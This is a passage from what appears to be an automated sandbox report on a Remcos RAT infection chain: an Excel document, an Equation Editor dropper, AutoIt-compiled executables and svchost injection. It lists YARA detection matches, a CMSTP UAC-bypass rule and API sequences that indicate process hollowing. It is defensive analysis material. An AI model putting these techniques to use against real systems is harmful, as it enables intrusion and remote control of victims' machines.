          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_00A89576
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DD9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00DD9576

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTR

          System Summary

          barindex
          Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
          Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 6.2.deblaterate.exe.720000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.deblaterate.exe.1070000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 6.2.deblaterate.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.deblaterate.exe.1070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: Process Memory Space: deblaterate.exe PID: 2008, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 1812, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: deblaterate.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: CKK.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: CKK.exe, 00000003.00000000.458425358.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2c03a176-f
          Source: CKK.exe, 00000003.00000000.458425358.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9b6eddfe-f
          Source: CKK.exe, 00000003.00000003.795866045.0000000002CB1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fa3e8400-4
          Source: CKK.exe, 00000003.00000003.795866045.0000000002CB1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_33e9f316-b
          Source: deblaterate.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: deblaterate.exe, 00000006.00000002.800878386.0000000000E02000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_78d549d8-5
          Source: deblaterate.exe, 00000006.00000002.800878386.0000000000E02000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_562c7e7a-8
          Source: deblaterate.exe, 0000000E.00000000.825941760.0000000001352000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c3fe7874-e
          Source: deblaterate.exe, 0000000E.00000000.825941760.0000000001352000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_88d26690-c
          Source: deblaterate.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_056348b3-3
          Source: deblaterate.exe.3.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_623f79e0-d
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CKK.exeJump to dropped file
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Roaming\CKK.exeProcess Stats: CPU usage > 49%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\CKK.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,7_2_004180EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,7_2_004132D2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,7_2_0041BB09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,7_2_0041BB35
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5D5EB: CreateFileW,DeviceIoControl,CloseHandle,3_2_00A5D5EB
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00A51201
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_00A5E8F6
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00DAE8F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,7_2_004167B4
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A620463_2_00A62046
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F80603_2_009F8060
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A582983_2_00A58298
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A2E4FF3_2_00A2E4FF
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A2676B3_2_00A2676B
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A848733_2_00A84873
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A1CAA03_2_00A1CAA0
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009FCAF03_2_009FCAF0
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A0CC393_2_00A0CC39
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A26DD93_2_00A26DD9
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F91C03_2_009F91C0
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A0B1193_2_00A0B119
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A113943_2_00A11394
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A117063_2_00A11706
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A1781B3_2_00A1781B
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A119B03_2_00A119B0
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_009F79203_2_009F7920
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A0997D3_2_00A0997D
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A17A4A3_2_00A17A4A
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A17CA73_2_00A17CA7
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A11C773_2_00A11C77
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A29EEE3_2_00A29EEE
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A7BE443_2_00A7BE44
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00A11F323_2_00A11F32
          Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_001936903_2_00193690
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D4BF406_2_00D4BF40
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DB20466_2_00DB2046
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D480606_2_00D48060
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DA82986_2_00DA8298
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D7E4FF6_2_00D7E4FF
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D7676B6_2_00D7676B
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00DD48736_2_00DD4873
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D4CAF06_2_00D4CAF0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D6CAA06_2_00D6CAA0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D5CC396_2_00D5CC39
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D76DD96_2_00D76DD9
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D491C06_2_00D491C0
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D5B1196_2_00D5B119
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D613946_2_00D61394
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 6_2_00D617066_2_00D61706
